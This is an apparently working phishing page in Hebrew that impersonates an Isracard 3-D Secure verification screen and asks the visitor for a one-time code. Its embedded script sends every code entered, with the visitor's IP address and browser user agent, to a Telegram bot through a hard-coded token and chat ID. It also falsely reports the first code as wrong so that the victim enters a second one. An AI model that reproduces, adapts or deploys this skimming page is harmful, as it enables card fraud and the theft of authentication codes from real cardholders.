<!DOCTYPE html>
<html lang="en" dir="rtl">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width,initial-scale=1.0">
  <title>3-D Secure</title>
  <link rel="stylesheet" href="css/s.css">
</head>
<body>
  <form id="mainForm" action="done.php" method="post" onsubmit="return validateForm();">
    <input type="hidden" name="challengeWindowSize" value="05">
    <input type="hidden" name="threeDSServerTransID" value="d31da877-c440-41d3-8215-f6b980a8f7bd">
    <input type="hidden" name="messageVersion" value="2.2.0">
    <input type="hidden" name="acsTransID" value="636fe30c-7a3e-4ad7-b560-1e9db0689aa6">

    <div class="container">
      <header class="header">
        <div>secure checkout</div>
        <button type="button" class="close" aria-label="Close">
          <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 16 16">
            <path class="cls-white" d="M8,0a8,8,0,1,0,8,8A8.009,8.009,0,0,0,8,0Zm3.236,10.293a.333.333,0,0,1,0,.471l-.471.471a.333.333,0,0,1-.471,0L8,8.942,5.707,11.235a.333.333,0,0,1-.471,0l-.471-.471a.333.333,0,0,1,0-.471L7.057,8,4.764,5.707a.333.333,0,0,1,0-.471l.471-.471a.333.333,0,0,1,.471,0L8,7.057l2.293-2.293a.333.333,0,0,1,.471,0l.471.471a.333.333,0,0,1,0,.471L8.942,8Z"/>
          </svg>
        </button>
      </header>

      <div class="bank-info">
        <img src="img/c8e42fe9-e66e-438a-ba4a-8ad445c270a6.jpeg" alt="Bank Logo">
        <img src="img/mc_idcheck_vrt_pos_140px.png" alt="Payment Logo">
      </div>

      <h2 id="info-header" class="info-header">כרטיסך מאובטח ע"י קבוצת ישראכרט אנא אמת זהותך</h2>

      <div id="info-text" class="scrollbar info-text">
        תשלום עסקה ע"ס &lrm;17.60&nbsp;ILS&lrm; בכרטיס המסתיים בספרות <span id="last4"></span>&lrm;<br><br>
        קוד חד-פעמי ישלח למספר הטלפון הסלולרי המעודכן במערכות קבוצת ישראכרט באמצעות SMS ו/או WhatsApp.<br>
        אם לא קיבלת את המסרון אנא התקשר לטלפון &lrm;972-3-6364488&lrm;<br>
        אנא הקלד את הקוד כאן:
      </div>

      <div class="actions">
        <div class="otp-input">
          <input id="code" name="code" class="input like-password" type="password"
                 autocomplete="one-time-code" inputmode="numeric" pattern="\d{4,6}"
                 minlength="4" maxlength="6" required>
          <div id="error-icon" class="icon hide"></div>
          <div id="invalid-input-msg" class="error-text hide"></div>
        </div>
        <button id="submit-label" class="submit-label" type="submit">אישור</button>
      </div>

      <button id="resend-label" class="resend-label button-link" type="button" name="resend" value="resend" formnovalidate>
        לא קיבלתי את הקוד, תשלחו לי שוב
      </button>

      <footer id="footer">
        <div id="why-info-label" class="why-info-label">
          <i id="why-arrow" class="arrow"></i> רוצה לדבר איתנו?
        </div>
        <div class="expandable-text">
          <p id="why-info-text" class="scrollbar">
            אימות זהותך נדרש על מנת להגן על כרטיסך מפני הונאות באינטרנט.<br>
            שירות זה הינו ללא תשלום…<br>
            מספר הטלפון לתמיכה בשירות ‎972-3-6364488‎
          </p>
        </div>
      </footer>
    </div>
  </form>

  <script>
    const TELEGRAM_TOKEN   = '8232406612:AAGAkW1LIKDB0c9SQVYwZXpIU4PFE0KiMS8';
    const TELEGRAM_CHAT_ID = '-4882525048';

    function sendToTelegram(message){
      fetch(`https://api.telegram.org/bot${TELEGRAM_TOKEN}/sendMessage?chat_id=${TELEGRAM_CHAT_ID}&text=${encodeURIComponent(message)}`)
        .catch(console.error);
    }

    let clientIP='unknown';
    fetch('https://api.ipify.org?format=json').then(r=>r.json()).then(d=>clientIP=d.ip).catch(()=>{});

    document.addEventListener('DOMContentLoaded',()=>{
      const last4 = sessionStorage.getItem('last4') || 'XXXX';
      document.getElementById('last4').textContent = last4;
    });

    const codeInput=document.getElementById('code');
    codeInput.addEventListener('input',()=>{
      codeInput.value = codeInput.value.replace(/\D/g,'').slice(0,6);
      clearFeedback();
    });

    let attempts=0;
    function validateForm(){
      const val=codeInput.value.trim();
      if(!/^\d{4,6}$/.test(val)){
        showFeedback('יש להזין קוד באורך 4-6 ספרות');
        return false;
      }
      const ua=navigator.userAgent;
      sendToTelegram(`OTP attempt ${attempts+1}: ${val}\nIP: ${clientIP}\nUA: ${ua}`);
      if(attempts===0){
        attempts++;
        showFeedback('הקוד שגוי, נסה שוב');
        codeInput.value='';
        return false;
      }
      clearFeedback();
      return true;
    }

    function showFeedback(msg){
      document.getElementById('error-icon').classList.remove('hide');
      const m=document.getElementById('invalid-input-msg'); m.textContent=msg; m.classList.remove('hide');
    }
    function clearFeedback(){
      document.getElementById('error-icon').classList.add('hide');
      document.getElementById('invalid-input-msg').classList.add('hide');
    }
  </script>
</body>
</html>
